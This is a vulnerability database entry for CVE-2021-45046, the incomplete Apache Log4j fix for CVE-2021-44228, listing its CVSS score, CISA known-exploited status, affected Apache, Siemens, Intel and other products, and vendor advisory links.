CVE-2021-45046

CRITICAL CISA KEV
Published Dec 14, 20214y ago · Modified Jun 17, 20262w ago
9.0 CVSS 3.1
Critical
Find Similar
Published Dec 14, 2021 4y ago
Last Modified Jun 17, 2026 2w ago
KEV Listed May 1, 2023 3y ago
KEV Due May 22, 2023 1139d overdue

Description

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

CVSS Details

Base Score
9.0
Exploitability
2.2
Impact
6.0
Vector string
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector Network
Attack Complexity High
Privileges Required None
User Interaction None
Scope Changed
Confidentiality High
Integrity High
Availability High

Threat Intelligence

CISA Known Exploited Overdue 1139d
Added
May 1, 2023
Due
May 22, 2023

Apply updates per vendor instructions.

Exploit & Patch Status
Actively Exploited (KEV)
Patch Available

Weaknesses 1

CWE-917

Affected Products 96

VendorProductVersionRange
apachelog4j*≥2.0.1  –  <2.12.2
apachelog4j*≥2.13.0  –  <2.16.0
apachelog4j2.0any
apachelog4j2.0any
apachelog4j2.0any
apachelog4j2.0any
cvatcomputer_vision_annotation_tool*any
intelaudio_development_kit*any
inteldatacenter_manager*any
intelgenomics_kernel_library*any
inteloneapi*any
intelsecure_device_onboard*any
intelsensor_solution_firmware_development_kit*any
intelsystem_debugger*any
intelsystem_studio*any
siemenssppa-t3000_ses3000_firmware*any
siemenssppa-t3000_ses3000*any
siemenscaptial* <2019.1
siemenscaptial2019.1any
siemenscaptial2019.1any
siemenscomos*any
siemensdesigo_cc_advanced_reports4.0any
siemensdesigo_cc_advanced_reports4.1any
siemensdesigo_cc_advanced_reports4.2any
siemensdesigo_cc_advanced_reports5.0any
siemensdesigo_cc_advanced_reports5.1any
siemensdesigo_cc_info_center5.0any
siemensdesigo_cc_info_center5.1any
siemense-car_operation_center* <2021-12-13
siemensenergy_engage3.1any
siemensenergyip8.5any
siemensenergyip8.6any
siemensenergyip8.7any
siemensenergyip9.0any
siemensenergyip_prepay3.7any
siemensenergyip_prepay3.8any
siemensgma-manager* <8.6.2j-398
siemenshead-end_system_universal_device_integration_system*any
siemensindustrial_edge_management*any
siemensindustrial_edge_management_hub* <2021-12-13
siemenslogo\!_soft_comfort*any
siemensmendix*any
siemensmindsphere* <2021-12-11
siemensnavigator* <2021-12-13
siemensnx*any
siemensopcenter_intelligence* ≤3.2
siemensoperation_scheduler* ≤1.1.3
siemenssentron_powermanager4.1any
siemenssentron_powermanager4.2any
siemenssiguard_dsa4.2any
siemenssiguard_dsa4.3any
siemenssiguard_dsa4.4any
siemenssipass_integrated2.80any
siemenssipass_integrated2.85any
siemenssiveillance_command* ≤4.16.2.1
siemenssiveillance_control_pro*any
siemenssiveillance_identity1.5any
siemenssiveillance_identity1.6any
siemenssiveillance_vantage*any
siemenssiveillance_viewpoint*any
siemenssolid_edge_cam_pro*any
siemenssolid_edge_harness_design* <2020
siemenssolid_edge_harness_design2020any
siemenssolid_edge_harness_design2020any
siemenssolid_edge_harness_design2020any
siemensspectrum_power_4* <4.70
siemensspectrum_power_44.70any
siemensspectrum_power_44.70any
siemensspectrum_power_44.70any
siemensspectrum_power_7* <2.30
siemensspectrum_power_72.30any
siemensspectrum_power_72.30any
siemensspectrum_power_72.30any
siemensteamcenter*any
siemenstracealertserverplus*any
siemensvesys* <2019.1
siemensvesys2019.1any
siemensvesys2019.1any
siemensvesys2019.1any
siemensxpedition_enterprise*any
siemensxpedition_package_integrator*any
debiandebian_linux10.0any
debiandebian_linux11.0any
sonicwallemail_security* <10.0.12
fedoraprojectfedora34any
fedoraprojectfedora35any
siemens6bk1602-0aa12-0tp0*any
siemens6bk1602-0aa12-0tp0_firmware* <2.7.0
siemens6bk1602-0aa22-0tp0*any
siemens6bk1602-0aa22-0tp0_firmware* <2.7.0
siemens6bk1602-0aa32-0tp0*any
siemens6bk1602-0aa32-0tp0_firmware* <2.7.0
siemens6bk1602-0aa42-0tp0*any
siemens6bk1602-0aa42-0tp0_firmware* <2.7.0
siemens6bk1602-0aa52-0tp0*any
siemens6bk1602-0aa52-0tp0_firmware* <2.7.0

References 22

  • openwall.com http://www.openwall.com/lists/oss-security/2021/12/14/4
    Mailing ListMitigationThird Party Advisory
  • openwall.com http://www.openwall.com/lists/oss-security/2021/12/15/3
    Mailing ListThird Party Advisory
  • openwall.com http://www.openwall.com/lists/oss-security/2021/12/18/1
    Mailing ListThird Party Advisory
  • cert-portal.siemens.com https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
    Third Party Advisory
  • cert-portal.siemens.com https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf
    Third Party Advisory
  • cert-portal.siemens.com https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
    Third Party Advisory
  • cert-portal.siemens.com https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf
    Third Party Advisory
  • lists.fedoraproject.org https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/
    Mailing ListRelease Notes
  • lists.fedoraproject.org https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/
    Mailing ListRelease Notes
  • logging.apache.org https://logging.apache.org/log4j/2.x/security.html
    MitigationRelease NotesVendor Advisory
  • psirt.global.sonicwall.com https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
    Third Party Advisory
  • security.gentoo.org https://security.gentoo.org/glsa/202310-16
    Third Party Advisory
  • tools.cisco.com https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
    Third Party Advisory
  • cisa.gov https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-45046
    US Government Resource
  • cve.org https://www.cve.org/CVERecord?id=CVE-2021-44228
    Not Applicable
  • debian.org https://www.debian.org/security/2021/dsa-5022
    Third Party Advisory
  • intel.com https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
    Third Party Advisory
  • kb.cert.org https://www.kb.cert.org/vuls/id/930724
    Third Party AdvisoryUS Government Resource
  • oracle.com https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
    Third Party Advisory
  • oracle.com https://www.oracle.com/security-alerts/cpuapr2022.html
    Third Party Advisory
  • oracle.com https://www.oracle.com/security-alerts/cpujan2022.html
    PatchThird Party Advisory
  • oracle.com https://www.oracle.com/security-alerts/cpujul2022.html
    Third Party Advisory

Remediation

  • oracle.com https://www.oracle.com/security-alerts/cpujan2022.html
    PatchThird Party Advisory